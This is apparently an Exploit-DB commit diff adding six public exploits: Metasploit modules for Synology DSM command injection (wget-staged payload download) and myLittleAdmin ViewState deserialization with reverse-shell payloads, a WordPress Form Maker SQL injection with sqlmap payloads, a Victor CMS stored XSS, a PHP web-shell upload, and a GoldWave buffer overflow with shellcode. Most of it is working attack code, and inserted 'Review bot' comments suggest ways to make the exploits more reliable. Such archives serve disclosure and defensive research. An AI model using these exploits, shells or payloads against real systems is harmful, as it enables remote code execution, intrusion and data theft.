DB: 2020-05-26

6 changes to exploits/shellcodes

GoldWave - Buffer Overflow (SEH Unicode)
Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)
Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)
Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)
Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting
Online Discussion Forum Site 1.0 - Remote Code Execution
This commit is contained in:
Offensive Security 2020-05-26 05:01:56 +00:00
parent 5308efc65c
commit 4fbd3630c8
7 changed files with 647 additions and 0 deletions

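--- a/exploits/hardware/remote/48514.rb
+++ b/exploits/hardware/remote/48514.rb
@@ -0,0 +1,209 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::Remote::HttpServer
+include Msf::Exploit::FileDropper
+DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
+&junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x.freeze
+def initialize(info = {})
+super(
+update_info(
+info,
+'Name' => 'Synology DiskStation Manager smart.cgi Remote Command Execution',
+'Description' => %q{
+This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
+versions < 5.2-5967-5, which allows the execution of arbitrary commands under root
+privileges after website authentication.
+The vulnerability is located in webman/modules/StorageManager/smart.cgi, which
+allows appending of a command to the device to be scanned. However, the command
+with drive is limited to 30 characters. A somewhat valid drive name is required,
+thus /dev/sd is used, even though it doesn't exist. To circumvent the character
+restriction, a wget input file is staged in /a, and executed to download our payload
+to /b. From there the payload is executed. A wfsdelay is required to give time
+for the payload to download, and the execution of it to run.
+},
+'Author' =>
+[
+'Nigusu Kassahun', # Discovery
+'h00die' # metasploit module
+],
+'References' =>
+[
+[ 'CVE', '2017-15889' ],
+[ 'EDB', '43190' ],
+[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
+[ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
+],
+'Privileged' => true,
+'Stance' => Msf::Exploit::Stance::Aggressive,
+'Platform' => ['python'],
+'Arch' => [ARCH_PYTHON],
+'Targets' =>
+[
+['Automatic', {}]
+],
+'DefaultTarget' => 0,
+'DefaultOptions' => {
+'PrependMigrate' => true,
+'WfsDelay' => 10
+},
+'License' => MSF_LICENSE,
+'DisclosureDate' => 'Nov 08 2017'
+)
+)
+register_options(
+[
+Opt::RPORT(5000),
+OptString.new('TARGETURI', [true, 'The URI of the Synology Website', '/']),
+OptString.new('USERNAME', [true, 'The Username for Synology', 'admin']),
+OptString.new('PASSWORD', [true, 'The Password for Synology', ''])
+]
+)
+register_advanced_options [
+OptBool.new('ForceExploit', [false, 'Override check result', false])
+]
+end
+def check
+vprint_status('Trying to detect installed version')
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path, 'webman', 'info.cgi'),
+'vars_get' => { 'host' => '' }
+})
+if res && (res.code == 200) && res.body =~ DEVICE_INFO_PATTERN
+version = "#{$LAST_MATCH_INFO[:major]}.#{$LAST_MATCH_INFO[:minor]}"
+build = $LAST_MATCH_INFO[:build]
+model = $LAST_MATCH_INFO[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
+model = "DS#{model}" unless model =~ /^[A-Z]/
+else
+vprint_error('Detection failed')
+return CheckCode::Unknown
+end
+vprint_status("Model #{model} with version #{version}-#{build} detected")
+case version
+when '3.0', '4.0', '4.1', '4.2', '4.3', '5.0', '5.1'
+return CheckCode::Appears
+when '5.2'
+return CheckCode::Appears if build < '5967-5'
+end
+CheckCode::Safe
+end
+def on_request_uri(cli, _request, cookie, token)
+print_good('HTTP Server request received, sending payload')
+send_response(cli, payload.encoded)
+print_status('Executing payload')
+inject_request(cookie, token, 'python b')
+end
+def inject_request(cookie, token, cmd = '')
+send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'webman', 'modules', 'StorageManager', 'smart.cgi'),
+'cookie' => cookie,
+'headers' => {
+'X-SYNO-TOKEN' => token
+},
+'vars_post' => {
+'action' => 'apply',
+'operation' => 'quick',
+'disk' => "/dev/sd`#{cmd}`"
+}
+})
+end
+def login
+# If you try to debug login through the browser, you'll see that desktop.js calls
+# ux-all.js to do an RSA encrypted login.
+# Wowever in a stroke of luck Mrs. h00die caused
+# a power sag while tracing/debugging the loging, causing the NAS to power off.
+# when that happened, it failed to get the crypto vars, and defaulted to a
+# non-encrypted login, which seems to work just fine. greetz Mrs. h00die!
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'webman', 'login.cgi'),
+'vars_get' => { 'enable_syno_token' => 'yes' },
+'vars_post' => {
+'username' => datastore['USERNAME'],
+'passwd' => datastore['PASSWORD'],
+'OTPcode' => '',
+'__cIpHeRtExT' => '',
+'client_time' => Time.now.to_i,
+'isIframeLogin' => 'yes'
+}
+})
+if res && %r{<div id='synology'>(?<json>.*)</div>}m =~ res.body
+result = JSON.parse(json)
+fail_with(Failure::BadConfig, 'Incorrect Username/Password') if result['result'] == 'error'
+if result['result'] == 'success'
+return res.get_cookies, result['SynoToken']
+end
+fail_with(Failure::Unknown, "Unknown response: #{result}")
+end
+end
+def exploit
+unless check == CheckCode::Appears
+unless datastore['ForceExploit']
+fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+end
+print_warning 'Target does not appear to be vulnerable'
+end
+if datastore['SRVHOST'] == '0.0.0.0'
+fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
+end
+begin
+print_status('Attempting Login')
+cookie, token = login
+start_service({ 'Uri' => {
+'Proc' => proc do |cli, req|
+on_request_uri(cli, req, cookie, token)
+end,
+'Path' => '/'
+} })
+print_status('Cleaning env')
+inject_request(cookie, token, cmd = 'rm -rf /a')
+inject_request(cookie, token, cmd = 'rm -rf b')
+command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
+command_space = 22 - "echo -n ''>>/a".length
+command_space -= 1
+command.each_slice(command_space) do |a|
+a = a.join('')
+vprint_status("Staging wget with: echo -n '#{a}'>>/a")
+inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a")
+end
+print_status('Requesting payload pull')
+register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
+register_file_for_cleanup('/a')
+inject_request(cookie, token, cmd = 'wget -i /a -O b')
+# at this point we let the HTTP server call the last stage
+# wfsdelay should be long enough to hold out for everything to download and run
+rescue ::Rex::ConnectionError
+fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+end
+end
+end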
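Review bot: `login` falls off the end and returns nil when the response is missing or lacks the `<div id='synology'>` marker, so `cookie, token = login` in `exploit` proceeds with a nil cookie and token, starts the HTTP server and fires `inject_request` against a session that was never established. Add a terminal failure after the `if` block in `login`: `fail_with(Failure::UnexpectedReply, 'Unexpected login response (no synology div)')`. The Description says the payload is downloaded to `/b`, but the code runs `wget -i /a -O b` and `python b` relative to smart.cgi's working directory (the cleanup path `/usr/syno/synoman/webman/modules/StorageManager/b` confirms this), so the text should say `b` inside the StorageManager module directory. Since the cleanup runs `rm -rf /a` as root against a fixed root-level path, the Description should also warn that any existing `/a` on the target is destroyed.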


@ -0,0 +1,56 @@
# Exploit Title: Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Date: 2020 - 5 - 22
# Vender Homepage: https://help.10web.io/
# Version: <= 5.4.1
# Tested on: Ubuntu 18.04
Description:
SQL injection in the Form Maker by 10Web WordPress Plugin before 5.4.1
exists via the /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" s
parameter.
Poc:
GET /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" HTTP/1.1
Host: test-wp.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
Firefox/76.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie:
wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19;
wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1590140574;
PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb
Upgrade-Insecure-Requests: 1
SQLMap using:
sqlmap -u '
http://test-wp.com:80/wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=123'
--cookie='wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19;wp-settings-1=libraryContent%3Dbrowse;wp-settings-time-1=1590140574;PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb'
Parameter: s (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: page=blocked_ips_fm&s=-1027" OR 8913=8913#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: page=blocked_ips_fm&s=123" AND (SELECT 2867 FROM(SELECT
COUNT(*),CONCAT(0x717a707871,(SELECT
(ELT(2867=2867,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TxQH
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: page=blocked_ips_fm&s=123" AND SLEEP(5)-- oPEC
---
[17:20:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0
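Review bot: The affected-version statements disagree: the header says `# Version: <= 5.4.1` and the title names 5.4.1, while the Description says the injection exists in Form Maker "before 5.4.1"; one of them is wrong and should be corrected against the vendor changelog before anyone triages on it. The endpoint `wp-admin/admin.php?page=blocked_ips_fm` is an admin-menu page, so the "(Authenticated)" tag should say which role is required, e.g. `# Requires: WordPress administrator session`. The `wordpress_logged_in_*` cookies and `PHPSESSID` in the request and sqlmap command are session tokens from the author's test host; they are useless elsewhere and should be replaced with a placeholder such as `<admin session cookies>` so readers do not mistake them for part of the exploit.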


@ -0,0 +1,66 @@
# Exploit Title: Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-05-23
# Exploit Author: Nitya Nand
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Linux
# CVE : N/A
Description: The POST parameter 'user_name', 'user_firstname', 'user_lastname' is vulnerable to persistent cross site scripting Payload: <script>alert(1)</script>
POST /phpmaster/admin/users.php?source=add_user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/phpmaster/admin/users.php?source=add_user
Content-Type: multipart/form-data; boundary=---------------------------515906178311115682892435428
Content-Length: 417375
Connection: close
Cookie: PHPSESSID=8810e038f92cd7c711ee8b95db1dcacb
Upgrade-Insecure-Requests: 1
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_name"
"><script>alert(1)</script>
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_firstname"
"><script>alert(2)</script>
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_lastname"
"><script>alert(3)</script>
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_image"; filename="9400.jpg"
Content-Type: image/jpeg
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_role"
User
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_email"
abc@gmail.com
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_password"
1234
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="create_user"
Add User
-----------------------------515906178311115682892435428--
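Review bot: The request goes to `/admin/users.php?source=add_user` with a `PHPSESSID` cookie, so this stored XSS needs an authenticated admin session, yet neither the title nor the header says so; add `(Authenticated)` to the title and a line such as `# Requires: admin session (users.php is under /admin/)`. `Content-Length: 417375` cannot match the body shown, and the `user_image` part has a filename but no content, so the JPEG bytes were evidently stripped; anyone replaying this must recompute the length or drop the header, which the write-up should state. It would also help to name the page where the three payloads render (presumably the user listing), since that is what makes the "persistent" claim verifiable.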


@ -0,0 +1,21 @@
# Exploit Title: Online Discussion Forum Site 1.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-24
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
# Version: 1.0 (REQUIRED)
# Tested on: Windows 10 / Wamp Server
# CVE : N/A
Go to http://localhost/Online%20Discussion%20Forum%20Site/register.php register page to sign up
Then fill other fields and upload the shell.php with following PHP-shell-code
<?php
$command = shell_exec($_REQUEST['cmd']);
echo $command;
?>
After the registration process is completed go to the following page and execute the os command via uploaded shell
http://localhost/Online%20Discussion%20Forum%20Site/ups/shell.php?cmd=$THECODE-YOU-WANT-TO-EXECUTE
Any unauthenticated attacker is able to execute arbitrary os command
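Review bot: The dropped shell runs `shell_exec($_REQUEST['cmd'])` for anyone who requests `ups/shell.php`, so once uploaded during a test it is an unauthenticated backdoor on the target; gate it on a secret, e.g. `if (($_REQUEST['k'] ?? '') !== 'REPLACE_ME') { exit; }` before the `shell_exec` line, and delete the file when the test is done. The example URL `?cmd=$THECODE-YOU-WANT-TO-EXECUTE` should say the command must be URL-encoded. The write-up never states the root cause — presumably `register.php` stores the uploaded file under `ups/` without validating the extension or content type — and that one sentence is what a maintainer needs in order to fix it.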

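--- a/exploits/windows/local/48510.py
+++ b/exploits/windows/local/48510.py
@@ -0,0 +1,80 @@
+# Exploit Title: GoldWave 5.70 Buffer Overflow (SEH Unicode)
+# Date: 2020-05-14
+# Exploit Author: Andy Bowden
+# Vendor Homepage: https://www.goldwave.com/
+# Version: 5.70
+# Download Link: http://goldwave.com//downloads/gwave570.exe
+# Tested on: Windows 10 x86
+# PoC
+# 1. generate crash.txt, copy contents to clipboard
+# 2. open gold wave app
+# 3. select File, Open URL...
+# 4. paste contents from clipboard after 'http://'
+# 5. select OK
+f = open("crash.txt", "wb")
+buf = b""
+buf += b"\x41" * 1019
+buf += b"\x71\x71" # Unicode NOP
+buf += b"\xB3\x48" # 0x004800b3 | pop ecx, pop ebp, ret
+#realigning stack
+buf += b"\x75" # Unicode NOP
+buf += b"\x54" # Push ESP
+buf += b"\x75" # Unicode NOP
+buf += b"\x58" # POP EAX
+buf += b"\x75" # Unicode NOP
+buf += b"\x05\xFF\x10" # ADD EAX,
+buf += b"\x75" # Unicode NOP
+buf += b"\x2d\xEA\x10" # SUB EAX,
+buf += b"\x75"
+buf += b"\x71" * 595
+#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper
+BufferRegister=EAX -f python
+buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"
+buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"
+buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"
+buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"
+buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"
+buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"
+buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
+buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"
+buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"
+buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"
+buf += b"\x4c\x59\x58\x35\x32\x4b\x50\x4b\x50\x4d\x30\x31\x50"
+buf += b"\x43\x59\x4b\x35\x50\x31\x39\x30\x42\x44\x54\x4b\x50"
+buf += b"\x50\x30\x30\x54\x4b\x42\x32\x4c\x4c\x54\x4b\x31\x42"
+buf += b"\x4c\x54\x54\x4b\x34\x32\x4f\x38\x4c\x4f\x48\x37\x50"
+buf += b"\x4a\x4f\x36\x50\x31\x4b\x4f\x36\x4c\x4f\x4c\x31\x51"
+buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x39\x31\x38\x4f\x4c"
+buf += b"\x4d\x4d\x31\x59\x37\x4a\x42\x4a\x52\x42\x32\x51\x47"
+buf += b"\x34\x4b\x50\x52\x4c\x50\x34\x4b\x30\x4a\x4f\x4c\x54"
+buf += b"\x4b\x30\x4c\x4e\x31\x34\x38\x4b\x33\x30\x48\x4b\x51"
+buf += b"\x4a\x31\x30\x51\x54\x4b\x50\x59\x4d\x50\x4d\x31\x5a"
+buf += b"\x33\x44\x4b\x31\x39\x4c\x58\x39\x53\x4e\x5a\x30\x49"
+buf += b"\x44\x4b\x4e\x54\x34\x4b\x4d\x31\x4a\x36\x4e\x51\x4b"
+buf += b"\x4f\x36\x4c\x59\x31\x38\x4f\x4c\x4d\x4b\x51\x49\x37"
+buf += b"\x4e\x58\x4b\x30\x52\x55\x4b\x46\x4c\x43\x43\x4d\x4c"
+buf += b"\x38\x4f\x4b\x43\x4d\x4e\x44\x42\x55\x5a\x44\x30\x58"
+buf += b"\x54\x4b\x52\x38\x4e\x44\x4b\x51\x59\x43\x31\x56\x34"
+buf += b"\x4b\x4c\x4c\x50\x4b\x34\x4b\x50\x58\x4d\x4c\x4b\x51"
+buf += b"\x39\x43\x44\x4b\x4d\x34\x44\x4b\x4b\x51\x4a\x30\x35"
+buf += b"\x39\x30\x44\x4d\x54\x4d\x54\x31\x4b\x51\x4b\x53\x31"
+buf += b"\x50\x59\x50\x5a\x32\x31\x4b\x4f\x49\x50\x31\x4f\x31"
+buf += b"\x4f\x31\x4a\x34\x4b\x4e\x32\x4a\x4b\x54\x4d\x51\x4d"
+buf += b"\x51\x5a\x4b\x51\x54\x4d\x54\x45\x46\x52\x4b\x50\x4d"
+buf += b"\x30\x4b\x50\x32\x30\x33\x38\x4e\x51\x34\x4b\x42\x4f"
+buf += b"\x34\x47\x4b\x4f\x49\x45\x57\x4b\x5a\x50\x38\x35\x45"
+buf += b"\x52\x52\x36\x42\x48\x37\x36\x34\x55\x47\x4d\x55\x4d"
+buf += b"\x4b\x4f\x4a\x35\x4f\x4c\x4c\x46\x33\x4c\x4c\x4a\x43"
+buf += b"\x50\x4b\x4b\x39\x50\x33\x45\x4d\x35\x47\x4b\x50\x47"
+buf += b"\x4e\x33\x42\x52\x42\x4f\x31\x5a\x4b\x50\x50\x53\x4b"
+buf += b"\x4f\x49\x45\x52\x43\x53\x31\x42\x4c\x53\x33\x4e\x4e"
+buf += b"\x32\x45\x34\x38\x53\x35\x4b\x50\x41\x41"
+buf += b"\x44" * (5000 - len(buf))
+f.write(buf)
+f.close()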
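Review bot: The stack-realignment comments `# ADD EAX,` and `# SUB EAX,` are truncated, which hides the arithmetic the exploit depends on; if the input is widened to UTF-16LE as the Unicode NOPs imply, `\x05\xFF\x10` decodes as `ADD EAX, 0x001000FF` and `\x2d\xEA\x10` as `SUB EAX, 0x001000EA`, leaving EAX = ESP + 0x15, and the comments should say that (confirm in a debugger). The msfvenom comment appears split, with `BufferRegister=EAX -f python` on a line of its own; if that is how the file is stored rather than a rendering wrap, it is a `SyntaxError` and must be joined onto the `#msfvenom` line. The open/close pair should be `with open("crash.txt", "wb") as f:` so the file is closed even if `f.write` raises.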

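--- a/exploits/windows/remote/48513.rb
+++ b/exploits/windows/remote/48513.rb
@@ -0,0 +1,209 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+# <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
+VIEWSTATE_GENERATOR = 'CA0B0334'.freeze
+# <machineKey
+# validationKey="5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF"
+# decryptionKey="DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4"
+# validation="SHA1" />
+VIEWSTATE_VALIDATION_KEY =
+"\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \
+"\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \
+"\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \
+"\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::Remote::AutoCheck
+include Msf::Exploit::ViewState
+include Msf::Exploit::CmdStager
+include Msf::Exploit::Powershell
+def initialize(info = {})
+super(
+update_info(
+info,
+'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization',
+'Description' => %q{
+This module exploits a ViewState .NET deserialization vulnerability in
+web-based MS SQL Server management tool myLittleAdmin, for version 3.8
+and likely older versions, due to hardcoded <machineKey> parameters in
+the web.config file for ASP.NET.
+Popular web hosting control panel Plesk offers myLittleAdmin as an
+optional component that is selected automatically during "full"
+installation. This exploit caters to the Plesk target, though it
+should work fine against a standalone myLittleAdmin setup.
+Successful exploitation results in code execution as the user running
+myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as
+the "SQL Admin MSSQL anonymous account."
+Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.
+},
+'Author' => [
+# Reported to SSD (SecuriTeam) by an anonymous researcher
+# Publicly disclosed by Noam Rathaus of SSD (SecuriTeam)
+'Spencer McIntyre', # Inspiration
+'wvu' # Module
+],
+'References' => [
+['CVE', '2020-13166'],
+['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'],
+['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw']
+],
+'DisclosureDate' => '2020-05-15', # SSD (SecuriTeam) advisory
+'License' => MSF_LICENSE,
+'Platform' => 'win',
+'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+'Privileged' => false,
+'Targets' => [
+[
+'Windows Command',
+'Arch' => ARCH_CMD,
+'Type' => :win_cmd,
+'DefaultOptions' => {
+'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+}
+],
+[
+'Windows Dropper',
+'Arch' => [ARCH_X86, ARCH_X64],
+'Type' => :win_dropper,
+'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],
+'DefaultOptions' => {
+'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
+'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+}
+],
+[
+'PowerShell Stager',
+'Arch' => [ARCH_X86, ARCH_X64],
+'Type' => :psh_stager,
+'DefaultOptions' => {
+'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+}
+]
+],
+'DefaultTarget' => 2,
+'DefaultOptions' => {
+'SSL' => true,
+'WfsDelay' => 10 # First exploit attempt may be a little slow
+},
+'Notes' => {
+'Stability' => [CRASH_SAFE],
+'Reliability' => [REPEATABLE_SESSION],
+'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+}
+)
+)
+register_options([
+Opt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'),
+OptString.new('TARGETURI', [true, 'Base path', '/'])
+])
+# XXX: https://github.com/rapid7/metasploit-framework/issues/12963
+import_target_defaults
+end
+def check
+res = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path)
+)
+unless res
+return CheckCode::Unknown('Target did not respond to check request.')
+end
+unless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server')
+return CheckCode::Unknown('Target is not running myLittleAdmin.')
+end
+vprint_good("myLittleAdmin is running at #{full_uri}")
+check_viewstate(res.get_html_document)
+end
+def check_viewstate(html)
+viewstate = html.at('//input[@id = "__VIEWSTATE"]/@value')&.text
+unless viewstate
+return CheckCode::Detected("__VIEWSTATE not found, can't complete check.")
+end
+@viewstate_generator =
+html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text
+unless @viewstate_generator
+print_warning('__VIEWSTATEGENERATOR not found, using known default value')
+@viewstate_generator = VIEWSTATE_GENERATOR
+end
+# ViewState generator needs to be a packed integer now
+@viewstate_generator = [@viewstate_generator.to_i(16)].pack('V')
+we_can_sign_viewstate = can_sign_viewstate?(
+viewstate,
+extra: @viewstate_generator,
+key: VIEWSTATE_VALIDATION_KEY
+)
+if we_can_sign_viewstate
+return CheckCode::Vulnerable('We can sign our own ViewState.')
+end
+CheckCode::Safe("We can't sign our own ViewState.")
+end
+def exploit
+# NOTE: Automatic check is implemented by the AutoCheck mixin
+super
+print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+case target['Type']
+when :win_cmd
+execute_command(payload.encoded)
+when :win_dropper
+execute_cmdstager
+when :psh_stager
+execute_command(cmd_psh_payload(
+payload.encoded,
+payload.arch.first,
+remove_comspec: true
+))
+end
+end
+def execute_command(cmd, _opts = {})
+vprint_status("Serializing command: #{cmd}")
+res = send_request_cgi(
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path),
+'vars_post' => {
+# This is the only parameter we need for successful exploitation!
+'__VIEWSTATE' => generate_viewstate_payload(
+cmd,
+extra: @viewstate_generator,
+key: VIEWSTATE_VALIDATION_KEY
+)
+}
+)
+unless res && res.code == 302 && res.redirection.path == '/error/index.html'
+fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
+end
+print_good("Successfully executed command: #{cmd}")
+end
+end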
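Review bot: `@viewstate_generator` is only assigned inside `check_viewstate`, yet `execute_command` hands it to `generate_viewstate_payload` as `extra:`; if the operator disables the AutoCheck mixin's pre-exploit check, it is still nil and every ViewState is signed with the wrong generator. Give `execute_command` a fallback, `extra: @viewstate_generator || [VIEWSTATE_GENERATOR.to_i(16)].pack('V'),`, or compute the packed default once in `initialize`. The success test `res.redirection.path == '/error/index.html'` compares against an absolute path that ignores TARGETURI, so a non-root deployment would presumably be reported as PayloadFailed even after the command ran; that assumption deserves a comment beside the check. A comment above `VIEWSTATE_VALIDATION_KEY` should also state that these bytes are the vendor-shipped web.config defaults, which is why a site that regenerated its machineKey correctly comes back Safe from `check`.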


@ -11081,6 +11081,7 @@ id,file,description,date,author,type,platform,port
48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows,
48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows,
48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18157,6 +18158,8 @@ id,file,description,date,author,type,platform,port
48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php,
48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple,
